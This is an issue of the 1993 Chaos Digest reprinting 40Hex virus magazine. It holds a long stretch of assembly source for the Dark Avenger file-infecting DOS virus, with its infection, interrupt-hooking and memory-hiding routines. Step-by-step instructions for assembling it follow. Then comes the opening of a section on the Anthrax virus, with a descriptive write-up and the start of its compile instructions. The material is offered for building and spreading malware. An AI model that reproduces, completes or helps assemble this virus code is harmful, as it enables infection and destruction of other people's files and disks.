Chaos Digest Mercredi 26 Mai 1993 Volume 1 : Numero 37 ISSN 1244-4901 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.37 (26 Mai 1993) File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint) Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost by sending a message to: linux-activists-request@niksula.hut.fi with a mail header or first line containing the following informations: X-Mn-Admin: join CHAOS_DIGEST The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P. 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299) groups. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352) 466893. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP: * kragar.eff.org [192.88.144.4] in /pub/cud/chaos * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Tue May 11 09:24:40 PDT 1993 From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. ) Subject: File 1--40H VMag Issue 1 Volume 3 #002(2)-004(1) (reprint) [suite du listing de _Dark Avenger_ de ChaosD #1.35:] ; Check if the file is properly infected see_sick: sub dx,startup-copyright sbb cx,0 mov ax,4200h int 21h add ax,offset top_file adc dx,0 cmp ax,word ptr [top_save+18h] jne see_fuck cmp dx,word ptr [top_save+1ah] jne see_fuck mov dx,offset top_save+1ch mov si,dx mov cx,offset my_size mov ah,3fh int 21h jc see_fuck cmp cx,ax jne see_fuck xor di,di next_byte: lodsb scasb jne see_fuck loop next_byte stop_fuck_2: ret see_fuck: xor cx,cx ;Seek to the end of file xor dx,dx mov ax,4202h int 21h cmp word ptr [top_save],5a4dh je fuck_exe add ax,offset aux_size+200h ;Watch out for too big .COM files adc dx,0 je fuck_it ret ;Pad .EXE files to paragraph boundary. This is absolutely unnecessary. fuck_exe: mov dx,word ptr [top_save+18h] neg dl and dx,0fh xor cx,cx mov ax,4201h int 21h mov word ptr [top_save+18h],ax mov word ptr [top_save+1ah],dx fuck_it: mov ax,5700h ;Get file's date int 21h pushf push cx push dx cmp word ptr [top_save],5a4dh je exe_file ;Very clever, isn't it? mov ax,100h jmp short set_adr exe_file: mov ax,word ptr [top_save+14h] mov dx,word ptr [top_save+16h] set_adr: mov di,offset call_adr stosw mov ax,dx stosw mov ax,word ptr [top_save+10h] stosw mov ax,word ptr [top_save+0eh] stosw mov si,offset top_save ;This offers the possibilities to movsb ;some nasty programs to restore movsw ;exactly the original length xor dx,dx ;of the .EXE files mov cx,offset top_file mov ah,40h int 21h ;Write the virus jc go_no_fuck ;(don't trace here) xor cx,ax jnz go_no_fuck mov dx,cx mov ax,4200h int 21h cmp word ptr [top_save],5a4dh je do_exe mov byte ptr [top_save],0e9h mov ax,word ptr [top_save+18h] add ax,startup-copyright-3 mov word ptr [top_save+1],ax mov cx,3 jmp short write_header go_no_fuck: jmp short no_fuck ;Construct the .EXE file's header do_exe: call mul_hdr not ax not dx inc ax jne calc_offs inc dx calc_offs: add ax,word ptr [top_save+18h] adc dx,word ptr [top_save+1ah] mov cx,10h div cx mov word ptr [top_save+14h],startup-copyright mov word ptr [top_save+16h],ax add ax,(offset top_file-offset copyright-1)/16+1 mov word ptr [top_save+0eh],ax mov word ptr [top_save+10h],100h add word ptr [top_save+18h],offset top_file adc word ptr [top_save+1ah],0 mov ax,word ptr [top_save+18h] and ax,1ffh mov word ptr [top_save+2],ax pushf mov ax,word ptr [top_save+19h] shr byte ptr [top_save+1bh],1 rcr ax,1 popf jz update_len inc ax update_len: mov word ptr [top_save+4],ax mov cx,18h write_header: mov dx,offset top_save mov ah,40h int 21h ;Write the file beginning no_fuck: pop dx pop cx popf jc stop_fuck mov ax,5701h ;Restore the original file date int 21h stop_fuck: ret ;The following is used by the INT 21h and INT 27h handlers in connection ;to the program hiding in memory from those who don't need to see it. ;The whole system is absurde and meaningless and it is also another source ;for program conflicts. alloc: push ds call get_chain mov byte ptr ds:[0],'M' pop ds ;Assures that the program is the first one in the processes, ;which have intercepted INT 21h (yet another source of conflicts). ontop: push ds push ax push bx push dx xor bx,bx mov ds,bx lds dx,ds:[21h*4] cmp dx,offset int_21 jne search_segment mov ax,ds mov bx,cs cmp ax,bx je test_complete ;Searches the segment of the sucker who has intercepted INT 21h, in ;order to find where it has stored the old values and to replace them. ;Nothing is done for INT 27h. xor bx,bx search_segment: mov ax,[bx] cmp ax,offset int_21 jne search_next mov ax,cs cmp ax,[bx+2] je got_him search_next: inc bx jne search_segment je return_control got_him: mov ax,word ptr cs:[save_int_21] mov [bx],ax mov ax,word ptr cs:[save_int_21+2] mov [bx+2],ax mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds xor bx,bx ;Even if he has not saved them in the same segment, this won't help him. return_control: mov ds,bx mov ds:[21h*4],offset int_21 mov ds:[21h*4+2],cs test_complete: pop dx pop bx pop ax pop ds ret ;Fetch the segment of the last MCB get_chain: push ax push bx mov ah,62h call function mov ax,cs dec ax dec bx next_blk: mov ds,bx stc adc bx,ds:[3] cmp bx,ax jc next_blk pop bx pop ax ret ;Multiply by 16 mul_hdr: mov ax,word ptr [top_save+8] mul_16: mov dx,10h mul dx ret db 'This program was written in the city of Sofia ' db '(C) 1988-89 Dark Avenger',0 ;INT 13h handler. ;Calls the original vectors in BIOS, if it's a writing call int_13: cmp ah,3 jnz subfn_ok cmp dl,80h jnc hdisk db 0eah ;JMP XXXX:YYYY my_size: ;--- Up to here comparison disk: ; with the original is made dd 0 hdisk: db 0eah ;JMP XXXX:YYYY fdisk: dd 0 subfn_ok: db 0eah ;JMP XXXX:YYYY save_int_13: dd 0 call_adr: dd 100h stack_pointer: dd 0 ;The original value of SS:SP my_save: int 20h ;The original contents of the first nop ;3 bytes of the file top_file: ;--- Up to here the code is written filehndl equ $ ; in the files filename equ filehndl+2 ;Buffer for the name of the opened file save_int_27 equ filename+65 ;Original INT 27h vector save_int_21 equ save_int_27+4 ;Original INT 21h vector aux_size equ save_int_21+4 ;--- Up to here is moved into memory top_save equ save_int_21+4 ;Beginning of the buffer, which ;contains ; - The first 24 bytes read from file ; - File length (4 bytes) ; - The last bytes of the file ; (my_size bytes) top_bz equ top_save-copyright my_bz equ my_size-copyright code ends end ------------------------------------------------------------------------------ A few notes on assembling this virus. It's a little bit tricky assembling the Dark Avenger Virus. Use these steps below. I use Turbo Assembler 2.0, but I'm positve that MASM will work just as well. 1: TASM AVENGER.ASM 2: TLINK AVENGER.OBJ 3: EXE2BIN AVENGER AVENGER.COM Now make a 3 byte file named JUMP.TMP using DEBUG like this 4: DEBUG n jmp.tmp e 0100 E9 68 00 rcx 3 w q 5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM There you have it.... HR +++++ 40Hex Issue 3 0003 Anthrax Well, this is turning out to be a tribute issue to the Dark Avenger. Here is another one of his better known viruses. This is a nice one cause it not only is a file infector, but it is also a sort of boot sector virus. It is also what I dubbed a reincarnation virus, meaning that even if you clean your system of it, it may still live, because it leaves a copy of itself on the last sector of the disk. The virus can be reincarnated by the V2100 virus, also bu The Dark Avenger. Well, Patti Hoffman (one of my favorite people on earth, not) wrote this virus up. Aliases: V Status: Rare [Not for long] Discovery: July, 1990 Symptoms: .COM & .EXE growth Origin: Bulgaria Isolated: Netherlands Eff Length: 1040 - 1279 Bytes Type Code: PRAKX-Parasitic Resident .COM, .EXE, & Partition Table Infector Detection Method: ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+ Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+ General Comments: The Anthrax Virus was isolated in July 1990 in the Netherlands after it was uploaded onto several BBSes in a trojan anti-viral program, USCAN.ZIP. It is the second virus to be found in a copy of UScan during July 1990, the first virus being V2100. Anthrax is a memory resident generic infector of .COM and .EXE files, including COMMAND.COM. The first time a program infected with the Anthrax virus is executed on the system's hard disk, the virus will infect the hard disk's partition table. At this point, the virus is not memory resident. It will also write a copy of itself on the last few sectors of the system's hard disk. If data existed on those last few sectors of the hard disk, it will be destroyed. When the system is booted from the hard disk, the Anthrax virus will install itself memory resident. It will remain memory resident until the first program is executed. At that time, it will deinstall itself from being resident and infect one .COM or .EXE file. This virus does not infect files in the current directory first, but instead starts to infect files at the lowest level of the disk's directory tree. Later, when an infected program is executed, Anthrax will infect one .COM or .EXE file, searching the directory structure from the lowest level of the directory tree. If the executed infected program was located on the floppy drive, a .COM or .EXE file may or may not be infected. The Anthrax Virus's code is 1,024 bytes long, but infected programs will increase in length by 1,040 to 1,279 bytes. On the author's test system, the largest increase in length experienced was 1,232 bytes. Infected files will always have an infected file length that is a multiple of 16. The following text strings can be found in files infected with the Anthrax virus: "(c)Damage, Inc." "ANTHRAX" A third text string occurs in the viral code, but it is in Cyrillics. Per Vesselin Bontchev, this third string translates to: "Sofia 1990". Since Anthrax infects the hard disk partition tables, infected systems must have the partition table disinfected or rebuilt in order to remove the virus. This disinfection can be done with either a low- level format or use of the MDisk/P program for the correct DOS version after powering off and rebooting from a write-protected boot diskette for the system. Any .COM or .EXE files infected with Anthrax must also be disinfected or erased. Since a copy of the virus will exist on the last few sectors of the drive, these must also be located and overwritten. Anthrax interacts with another virus: V2100. If a system which was previously infected with Anthrax should become infected with the V2100 virus, the V2100 virus will check the last few sectors of the hard disk for the spare copy of Anthrax. If the spare copy is found, then Anthrax will be copied to the hard disk's partition table. It is not known if Anthrax carries any destructive capabilities or trigger/activation dates. Here is the actual virus. Well if this is your fist copy of 40Hex, let me explain how to compile it. First copy what is below with your editor. Then save it to a file called ANTHRAX.SCR. Then type at the command line - DEBUG